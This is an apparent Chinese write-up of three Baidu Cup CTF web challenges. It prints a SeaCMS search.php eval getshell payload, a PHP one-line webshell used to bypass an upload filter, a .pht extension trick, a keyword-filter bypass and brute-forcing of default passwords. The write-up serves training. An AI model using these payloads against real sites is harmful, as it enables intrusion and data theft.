“百度杯”CTF比赛 九月场

  • Test:

“百度杯”CTF比赛 九月场

题目提示查资料

打开地址,是一个海洋cms

“百度杯”CTF比赛 九月场

海洋cms有个前台getshell的漏洞

在地址后加上/search.php?searchtype=5&tid=&area=eval($_POST[x]),用菜刀连接,密码为x

“百度杯”CTF比赛 九月场

连接后还是找不到flag,可能flag在数据库里

找找数据库的配置文件

“百度杯”CTF比赛 九月场

用菜刀连接数据库

“百度杯”CTF比赛 九月场

MYSQL为数据库类型,localhost为连接地址,seacms为数据库名称,sea_user为用户名,46e06533407e为密码,utf8为字符编码

“百度杯”CTF比赛 九月场

得到flag

  • 123:

“百度杯”CTF比赛 九月场

右键查看源代码

“百度杯”CTF比赛 九月场

打开user.php是空白的,右键查看源码也是空白的,可能有备份文件

访问user.php.bak

“百度杯”CTF比赛 九月场

有个备份文件,下载下来

打开,是一堆用户名

“百度杯”CTF比赛 九月场

源码提示用户的默认密码为用户名+出生日期

爆破一波

 “百度杯”CTF比赛 九月场

爆破一波出生日期为1990的

加载user.php.bak为字典

“百度杯”CTF比赛 九月场

开启爆破

“百度杯”CTF比赛 九月场

爆出了一个结果,用户名lixiuyun,密码lixiuyun1990

登陆

“百度杯”CTF比赛 九月场

没有内容,右键看看源代码

“百度杯”CTF比赛 九月场

本地构造个html

“百度杯”CTF比赛 九月场

选择文件上传

“百度杯”CTF比赛 九月场

构造1.jpg.pht绕过检测

“百度杯”CTF比赛 九月场

得到一个view.php的地址

“百度杯”CTF比赛 九月场

给file参数传个值flag

“百度杯”CTF比赛 九月场

flag直接被过滤了

绕过,http://98e784aa4f5c403d9d6a5605ad73def6fe8f697fc51f40f0.game.ichunqiu.com/view.php?file=fflaglag

得到flag

“百度杯”CTF比赛 九月场

  • Upload:

题目提示flag就在flag.php中

“百度杯”CTF比赛 九月场

文件上传处可以上传任意类型的文件

“百度杯”CTF比赛 九月场

直接上传php文件

但是php文件里的“<?”和“php“都会被过滤

构造php一句话

<script language='PHP'> @eval($_POST['x']);</script>上传

“百度杯”CTF比赛 九月场

点击“上传成功!”就能访问一句话的地址

用菜刀连接

“百度杯”CTF比赛 九月场

根目录找到flag.php

“百度杯”CTF比赛 九月场

得到flag

“百度杯”CTF比赛 九月场